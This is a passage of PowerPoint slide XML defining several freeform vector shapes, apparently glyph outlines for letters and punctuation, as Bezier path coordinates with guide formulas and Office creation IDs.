            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 77 w 249"/>
                <a:gd name="T1" fmla="*/ 26 h 217"/>
                <a:gd name="T2" fmla="*/ 57 w 249"/>
                <a:gd name="T3" fmla="*/ 3 h 217"/>
                <a:gd name="T4" fmla="*/ 20 w 249"/>
                <a:gd name="T5" fmla="*/ 3 h 217"/>
                <a:gd name="T6" fmla="*/ 0 w 249"/>
                <a:gd name="T7" fmla="*/ 18 h 217"/>
                <a:gd name="T8" fmla="*/ 20 w 249"/>
                <a:gd name="T9" fmla="*/ 33 h 217"/>
                <a:gd name="T10" fmla="*/ 42 w 249"/>
                <a:gd name="T11" fmla="*/ 33 h 217"/>
                <a:gd name="T12" fmla="*/ 42 w 249"/>
                <a:gd name="T13" fmla="*/ 187 h 217"/>
                <a:gd name="T14" fmla="*/ 20 w 249"/>
                <a:gd name="T15" fmla="*/ 187 h 217"/>
                <a:gd name="T16" fmla="*/ 0 w 249"/>
                <a:gd name="T17" fmla="*/ 202 h 217"/>
                <a:gd name="T18" fmla="*/ 20 w 249"/>
                <a:gd name="T19" fmla="*/ 217 h 217"/>
                <a:gd name="T20" fmla="*/ 99 w 249"/>
                <a:gd name="T21" fmla="*/ 217 h 217"/>
                <a:gd name="T22" fmla="*/ 119 w 249"/>
                <a:gd name="T23" fmla="*/ 202 h 217"/>
                <a:gd name="T24" fmla="*/ 99 w 249"/>
                <a:gd name="T25" fmla="*/ 187 h 217"/>
                <a:gd name="T26" fmla="*/ 77 w 249"/>
                <a:gd name="T27" fmla="*/ 187 h 217"/>
                <a:gd name="T28" fmla="*/ 77 w 249"/>
                <a:gd name="T29" fmla="*/ 99 h 217"/>
                <a:gd name="T30" fmla="*/ 139 w 249"/>
                <a:gd name="T31" fmla="*/ 30 h 217"/>
                <a:gd name="T32" fmla="*/ 172 w 249"/>
                <a:gd name="T33" fmla="*/ 74 h 217"/>
                <a:gd name="T34" fmla="*/ 172 w 249"/>
                <a:gd name="T35" fmla="*/ 187 h 217"/>
                <a:gd name="T36" fmla="*/ 153 w 249"/>
                <a:gd name="T37" fmla="*/ 187 h 217"/>
                <a:gd name="T38" fmla="*/ 133 w 249"/>
                <a:gd name="T39" fmla="*/ 202 h 217"/>
                <a:gd name="T40" fmla="*/ 153 w 249"/>
                <a:gd name="T41" fmla="*/ 217 h 217"/>
                <a:gd name="T42" fmla="*/ 229 w 249"/>
                <a:gd name="T43" fmla="*/ 217 h 217"/>
                <a:gd name="T44" fmla="*/ 249 w 249"/>
                <a:gd name="T45" fmla="*/ 202 h 217"/>
                <a:gd name="T46" fmla="*/ 229 w 249"/>
                <a:gd name="T47" fmla="*/ 187 h 217"/>
                <a:gd name="T48" fmla="*/ 207 w 249"/>
                <a:gd name="T49" fmla="*/ 187 h 217"/>
                <a:gd name="T50" fmla="*/ 207 w 249"/>
                <a:gd name="T51" fmla="*/ 71 h 217"/>
                <a:gd name="T52" fmla="*/ 142 w 249"/>
                <a:gd name="T53" fmla="*/ 0 h 217"/>
                <a:gd name="T54" fmla="*/ 77 w 249"/>
                <a:gd name="T55" fmla="*/ 2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9" h="217">
                  <a:moveTo>
                    <a:pt x="77" y="26"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="10"/>
                    <a:pt x="77" y="3"/>
                    <a:pt x="57" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="33"/>
                    <a:pt x="13" y="33"/>
                    <a:pt x="20" y="33"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="42" y="33"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="187"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="187"/>
                    <a:pt x="0" y="187"/>
                    <a:pt x="0" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="217"/>
                    <a:pt x="13" y="217"/>
                    <a:pt x="20" y="217"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="99" y="217"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="217"/>
                    <a:pt x="119" y="217"/>
                    <a:pt x="119" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="187"/>
                    <a:pt x="107" y="187"/>
                    <a:pt x="99" y="187"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="77" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77" y="99"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="49"/>
                    <a:pt x="114" y="30"/>
                    <a:pt x="139" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="30"/>
                    <a:pt x="172" y="44"/>
                    <a:pt x="172" y="74"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="172" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153" y="187"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="187"/>
                    <a:pt x="133" y="187"/>
                    <a:pt x="133" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="217"/>
                    <a:pt x="146" y="217"/>
                    <a:pt x="153" y="217"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="229" y="217"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="236" y="217"/>
                    <a:pt x="249" y="217"/>
                    <a:pt x="249" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="249" y="187"/>
                    <a:pt x="237" y="187"/>
                    <a:pt x="229" y="187"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="207" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207" y="71"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="21"/>
                    <a:pt x="181" y="0"/>
                    <a:pt x="142" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="0"/>
                    <a:pt x="86" y="16"/>
                    <a:pt x="77" y="2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52" name="Freeform 893">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81198F7E-9361-4A80-BC53-2D155BE01828}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId69"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4179888" y="2108201"/>
              <a:ext cx="46038" cy="50800"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 46 w 136"/>
                <a:gd name="T1" fmla="*/ 28 h 147"/>
                <a:gd name="T2" fmla="*/ 24 w 136"/>
                <a:gd name="T3" fmla="*/ 0 h 147"/>
                <a:gd name="T4" fmla="*/ 2 w 136"/>
                <a:gd name="T5" fmla="*/ 28 h 147"/>
                <a:gd name="T6" fmla="*/ 8 w 136"/>
                <a:gd name="T7" fmla="*/ 129 h 147"/>
                <a:gd name="T8" fmla="*/ 24 w 136"/>
                <a:gd name="T9" fmla="*/ 147 h 147"/>
                <a:gd name="T10" fmla="*/ 40 w 136"/>
                <a:gd name="T11" fmla="*/ 129 h 147"/>
                <a:gd name="T12" fmla="*/ 46 w 136"/>
                <a:gd name="T13" fmla="*/ 28 h 147"/>
                <a:gd name="T14" fmla="*/ 134 w 136"/>
                <a:gd name="T15" fmla="*/ 28 h 147"/>
                <a:gd name="T16" fmla="*/ 112 w 136"/>
                <a:gd name="T17" fmla="*/ 0 h 147"/>
                <a:gd name="T18" fmla="*/ 90 w 136"/>
                <a:gd name="T19" fmla="*/ 28 h 147"/>
                <a:gd name="T20" fmla="*/ 96 w 136"/>
                <a:gd name="T21" fmla="*/ 129 h 147"/>
                <a:gd name="T22" fmla="*/ 112 w 136"/>
                <a:gd name="T23" fmla="*/ 147 h 147"/>
                <a:gd name="T24" fmla="*/ 128 w 136"/>
                <a:gd name="T25" fmla="*/ 129 h 147"/>
                <a:gd name="T26" fmla="*/ 134 w 136"/>
                <a:gd name="T27" fmla="*/ 2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47">
                  <a:moveTo>
                    <a:pt x="46" y="28"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="4"/>
                    <a:pt x="31" y="0"/>
                    <a:pt x="24" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="0"/>
                    <a:pt x="0" y="6"/>
                    <a:pt x="2" y="28"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8" y="129"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="136"/>
                    <a:pt x="10" y="147"/>
                    <a:pt x="24" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="147"/>
                    <a:pt x="39" y="138"/>
                    <a:pt x="40" y="129"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="46" y="28"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="134" y="28"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="4"/>
                    <a:pt x="119" y="0"/>
                    <a:pt x="112" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="0"/>
                    <a:pt x="89" y="6"/>
                    <a:pt x="90" y="28"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="96" y="129"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="136"/>
                    <a:pt x="98" y="147"/>
                    <a:pt x="112" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="125" y="147"/>
                    <a:pt x="127" y="138"/>
                    <a:pt x="128" y="129"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="134"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53" name="Freeform 894">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08E1FC35-A200-4366-97C3-0E973992B15B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId70"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4283076" y="2141538"/>
              <a:ext cx="20638" cy="74613"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 62 w 62"/>
                <a:gd name="T1" fmla="*/ 31 h 214"/>
                <a:gd name="T2" fmla="*/ 31 w 62"/>
                <a:gd name="T3" fmla="*/ 0 h 214"/>
                <a:gd name="T4" fmla="*/ 0 w 62"/>
                <a:gd name="T5" fmla="*/ 30 h 214"/>
                <a:gd name="T6" fmla="*/ 31 w 62"/>
                <a:gd name="T7" fmla="*/ 62 h 214"/>
                <a:gd name="T8" fmla="*/ 62 w 62"/>
                <a:gd name="T9" fmla="*/ 31 h 214"/>
                <a:gd name="T10" fmla="*/ 62 w 62"/>
                <a:gd name="T11" fmla="*/ 184 h 214"/>
                <a:gd name="T12" fmla="*/ 31 w 62"/>
                <a:gd name="T13" fmla="*/ 152 h 214"/>
                <a:gd name="T14" fmla="*/ 0 w 62"/>
                <a:gd name="T15" fmla="*/ 183 h 214"/>
                <a:gd name="T16" fmla="*/ 31 w 62"/>
                <a:gd name="T17" fmla="*/ 214 h 214"/>
                <a:gd name="T18" fmla="*/ 62 w 62"/>
                <a:gd name="T19" fmla="*/ 18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14">
                  <a:moveTo>
                    <a:pt x="62" y="31"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="12"/>
                    <a:pt x="47" y="0"/>
                    <a:pt x="31" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="15"/>
                    <a:pt x="0" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="49"/>
                    <a:pt x="15" y="62"/>
                    <a:pt x="31" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="62"/>
                    <a:pt x="62" y="46"/>
                    <a:pt x="62" y="31"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="62" y="184"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="165"/>
                    <a:pt x="47" y="152"/>
                    <a:pt x="31" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="152"/>
                    <a:pt x="0" y="168"/>
                    <a:pt x="0" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="201"/>
                    <a:pt x="15" y="214"/>
                    <a:pt x="31" y="214"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="214"/>
                    <a:pt x="62" y="199"/>
                    <a:pt x="62" y="18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54" name="Freeform 895">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B368173-718B-4B67-8878-7981627C192B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId71"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4359276" y="2108201"/>
              <a:ext cx="47625" cy="50800"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 46 w 136"/>
                <a:gd name="T1" fmla="*/ 28 h 147"/>
                <a:gd name="T2" fmla="*/ 24 w 136"/>
                <a:gd name="T3" fmla="*/ 0 h 147"/>
                <a:gd name="T4" fmla="*/ 2 w 136"/>
                <a:gd name="T5" fmla="*/ 28 h 147"/>
                <a:gd name="T6" fmla="*/ 8 w 136"/>
                <a:gd name="T7" fmla="*/ 129 h 147"/>
                <a:gd name="T8" fmla="*/ 24 w 136"/>
                <a:gd name="T9" fmla="*/ 147 h 147"/>
                <a:gd name="T10" fmla="*/ 40 w 136"/>
                <a:gd name="T11" fmla="*/ 129 h 147"/>
                <a:gd name="T12" fmla="*/ 46 w 136"/>
                <a:gd name="T13" fmla="*/ 28 h 147"/>
                <a:gd name="T14" fmla="*/ 134 w 136"/>
                <a:gd name="T15" fmla="*/ 28 h 147"/>
                <a:gd name="T16" fmla="*/ 112 w 136"/>
                <a:gd name="T17" fmla="*/ 0 h 147"/>
                <a:gd name="T18" fmla="*/ 90 w 136"/>
                <a:gd name="T19" fmla="*/ 28 h 147"/>
                <a:gd name="T20" fmla="*/ 97 w 136"/>
                <a:gd name="T21" fmla="*/ 129 h 147"/>
                <a:gd name="T22" fmla="*/ 112 w 136"/>
                <a:gd name="T23" fmla="*/ 147 h 147"/>
                <a:gd name="T24" fmla="*/ 128 w 136"/>
                <a:gd name="T25" fmla="*/ 129 h 147"/>
                <a:gd name="T26" fmla="*/ 134 w 136"/>
                <a:gd name="T27" fmla="*/ 2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47">
                  <a:moveTo>
                    <a:pt x="46" y="28"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="4"/>
                    <a:pt x="31" y="0"/>
                    <a:pt x="24" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="0"/>
                    <a:pt x="0" y="6"/>
                    <a:pt x="2" y="28"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8" y="129"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="136"/>
                    <a:pt x="10" y="147"/>
                    <a:pt x="24" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="147"/>
                    <a:pt x="39" y="138"/>
                    <a:pt x="40" y="129"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="46" y="28"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="134" y="28"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="4"/>
                    <a:pt x="119" y="0"/>
                    <a:pt x="112" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="0"/>
                    <a:pt x="89" y="6"/>
                    <a:pt x="90" y="28"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="97" y="129"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="136"/>
                    <a:pt x="99" y="147"/>
                    <a:pt x="112" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="125" y="147"/>
                    <a:pt x="127" y="138"/>
                    <a:pt x="128" y="129"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="134"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55" name="Freeform 896">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79A0F435-56D1-48B9-9893-34E58D9235C4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId72"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4438651" y="2139951"/>
              <a:ext cx="80963" cy="77788"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 155 w 234"/>
                <a:gd name="T1" fmla="*/ 203 h 222"/>
                <a:gd name="T2" fmla="*/ 209 w 234"/>
                <a:gd name="T3" fmla="*/ 219 h 222"/>
                <a:gd name="T4" fmla="*/ 234 w 234"/>
                <a:gd name="T5" fmla="*/ 204 h 222"/>
                <a:gd name="T6" fmla="*/ 214 w 234"/>
                <a:gd name="T7" fmla="*/ 189 h 222"/>
                <a:gd name="T8" fmla="*/ 184 w 234"/>
                <a:gd name="T9" fmla="*/ 185 h 222"/>
                <a:gd name="T10" fmla="*/ 184 w 234"/>
                <a:gd name="T11" fmla="*/ 77 h 222"/>
                <a:gd name="T12" fmla="*/ 86 w 234"/>
                <a:gd name="T13" fmla="*/ 0 h 222"/>
                <a:gd name="T14" fmla="*/ 13 w 234"/>
                <a:gd name="T15" fmla="*/ 36 h 222"/>
                <a:gd name="T16" fmla="*/ 36 w 234"/>
                <a:gd name="T17" fmla="*/ 59 h 222"/>
                <a:gd name="T18" fmla="*/ 58 w 234"/>
                <a:gd name="T19" fmla="*/ 36 h 222"/>
                <a:gd name="T20" fmla="*/ 68 w 234"/>
                <a:gd name="T21" fmla="*/ 31 h 222"/>
                <a:gd name="T22" fmla="*/ 86 w 234"/>
                <a:gd name="T23" fmla="*/ 30 h 222"/>
                <a:gd name="T24" fmla="*/ 150 w 234"/>
                <a:gd name="T25" fmla="*/ 81 h 222"/>
                <a:gd name="T26" fmla="*/ 0 w 234"/>
                <a:gd name="T27" fmla="*/ 156 h 222"/>
                <a:gd name="T28" fmla="*/ 83 w 234"/>
                <a:gd name="T29" fmla="*/ 222 h 222"/>
                <a:gd name="T30" fmla="*/ 155 w 234"/>
                <a:gd name="T31" fmla="*/ 203 h 222"/>
                <a:gd name="T32" fmla="*/ 150 w 234"/>
                <a:gd name="T33" fmla="*/ 111 h 222"/>
                <a:gd name="T34" fmla="*/ 150 w 234"/>
                <a:gd name="T35" fmla="*/ 153 h 222"/>
                <a:gd name="T36" fmla="*/ 131 w 234"/>
                <a:gd name="T37" fmla="*/ 184 h 222"/>
                <a:gd name="T38" fmla="*/ 86 w 234"/>
                <a:gd name="T39" fmla="*/ 192 h 222"/>
                <a:gd name="T40" fmla="*/ 35 w 234"/>
                <a:gd name="T41" fmla="*/ 156 h 222"/>
                <a:gd name="T42" fmla="*/ 150 w 234"/>
                <a:gd name="T43" fmla="*/ 111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4" h="222">
                  <a:moveTo>
                    <a:pt x="155" y="203"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="219"/>
                    <a:pt x="190" y="219"/>
                    <a:pt x="209" y="219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="223" y="219"/>
                    <a:pt x="234" y="219"/>
                    <a:pt x="234" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="234" y="189"/>
                    <a:pt x="222" y="189"/>
                    <a:pt x="214" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="189"/>
                    <a:pt x="188" y="187"/>
                    <a:pt x="184" y="185"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="77"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="42"/>
                    <a:pt x="157" y="0"/>
                    <a:pt x="86" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="13" y="0"/>
                    <a:pt x="13" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="51"/>
                    <a:pt x="24" y="59"/>
                    <a:pt x="36" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="59"/>
                    <a:pt x="57" y="55"/>
                    <a:pt x="58" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="32"/>
                    <a:pt x="58" y="32"/>
                    <a:pt x="68" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="30"/>
                    <a:pt x="82" y="30"/>
                    <a:pt x="86" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="30"/>
                    <a:pt x="150" y="46"/>
                    <a:pt x="150" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="83"/>
                    <a:pt x="0" y="108"/>
                    <a:pt x="0" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="190"/>
                    <a:pt x="32" y="222"/>
                    <a:pt x="83" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="222"/>
                    <a:pt x="132" y="219"/>
                    <a:pt x="155" y="203"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="150" y="111"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="150" y="153"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="164"/>
                    <a:pt x="150" y="175"/>
                    <a:pt x="131" y="184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="192"/>
                    <a:pt x="90" y="192"/>
                    <a:pt x="86" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="192"/>
                    <a:pt x="35" y="175"/>
                    <a:pt x="35" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="131"/>
                    <a:pt x="78" y="113"/>
                    <a:pt x="150" y="11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56" name="Freeform 897">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B308278E-4C78-46D2-AEAA-CFCFF0E22702}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId73"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4529138" y="2109788"/>
              <a:ext cx="69850" cy="106363"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 120 w 204"/>
                <a:gd name="T1" fmla="*/ 20 h 304"/>
                <a:gd name="T2" fmla="*/ 100 w 204"/>
                <a:gd name="T3" fmla="*/ 0 h 304"/>
                <a:gd name="T4" fmla="*/ 21 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 304"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 15 h 304"/>
                <a:gd name="T8" fmla="*/ 20 w 204"/>
                <a:gd name="T9" fmla="*/ 30 h 304"/>
                <a:gd name="T10" fmla="*/ 85 w 204"/>
                <a:gd name="T11" fmla="*/ 30 h 304"/>
                <a:gd name="T12" fmla="*/ 85 w 204"/>
                <a:gd name="T13" fmla="*/ 274 h 304"/>
                <a:gd name="T14" fmla="*/ 21 w 204"/>
                <a:gd name="T15" fmla="*/ 274 h 304"/>
                <a:gd name="T16" fmla="*/ 0 w 204"/>
                <a:gd name="T17" fmla="*/ 289 h 304"/>
                <a:gd name="T18" fmla="*/ 20 w 204"/>
                <a:gd name="T19" fmla="*/ 304 h 304"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 304 h 304"/>
                <a:gd name="T22" fmla="*/ 204 w 204"/>
                <a:gd name="T23" fmla="*/ 289 h 304"/>
                <a:gd name="T24" fmla="*/ 184 w 204"/>
                <a:gd name="T25" fmla="*/ 274 h 304"/>
                <a:gd name="T26" fmla="*/ 120 w 204"/>
                <a:gd name="T27" fmla="*/ 274 h 304"/>
                <a:gd name="T28" fmla="*/ 120 w 204"/>
                <a:gd name="T29" fmla="*/ 2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304">
                  <a:moveTo>
                    <a:pt x="120" y="20"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="5"/>
                    <a:pt x="117" y="0"/>
                    <a:pt x="100" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="30"/>
                    <a:pt x="13" y="30"/>
                    <a:pt x="20" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="85" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="274"/>
                    <a:pt x="0" y="274"/>
                    <a:pt x="0" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="13" y="304"/>
                    <a:pt x="20" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="304"/>
                    <a:pt x="204" y="304"/>
                    <a:pt x="204" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="274"/>
                    <a:pt x="192" y="274"/>
                    <a:pt x="184" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="120" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120" y="2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57" name="Freeform 898">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08A2DF91-6B6D-43B9-8E67-7D0A437EBEF2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId74"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4614863" y="2138363"/>
              <a:ext cx="82550" cy="119063"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 102 w 240"/>
                <a:gd name="T1" fmla="*/ 133 h 335"/>
                <a:gd name="T2" fmla="*/ 54 w 240"/>
                <a:gd name="T3" fmla="*/ 83 h 335"/>
                <a:gd name="T4" fmla="*/ 102 w 240"/>
